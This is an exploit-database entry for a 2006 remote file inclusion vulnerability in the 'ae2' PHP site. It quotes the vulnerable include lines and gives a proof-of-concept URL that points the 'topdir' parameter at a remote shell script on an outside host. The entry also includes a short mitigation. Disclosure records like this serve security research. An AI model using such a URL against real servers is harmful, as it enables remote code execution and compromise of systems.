header-logo
Suggest Exploit
vendor:
ae2
by:
k1tk4t
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: ae2
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ae2 (standart.inc.php) Remote File Inclusion

A remote file inclusion vulnerability exists in the standart.inc.php file of ae2. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameter 'topdir' in the standart.inc.php file. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file include statement.
Source

Exploit-DB raw data:

##################################################################################
# ae2 (standart.inc.php) Remote File Inclusion
# Download Source : http://ae.utbm.fr/equipeinfo/siteae-utbm-latest.tar.gz
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   -- #newhack[dot]org
########################################################################
file ;
standart.inc.php
########################################################################
bugs ;
require_once($topdir . "include/lib/wiki2xhtml.inc.php");
require_once($topdir . "include/entitieslinks.inc.php");
require_once($topdir."include/group.inc.php");
########################################################################
exmple and methode exploit ;
http://localhost/ae2/include/cts/standart.inc.php?topdir=http://shell/cmd.co?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubicrew (all member solpotcrew community)
person;
y3dips, lirva32, the_day,(&all echo staff)
illibero,NoGe(all member asiahacker), nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)

# milw0rm.com [2006-10-10]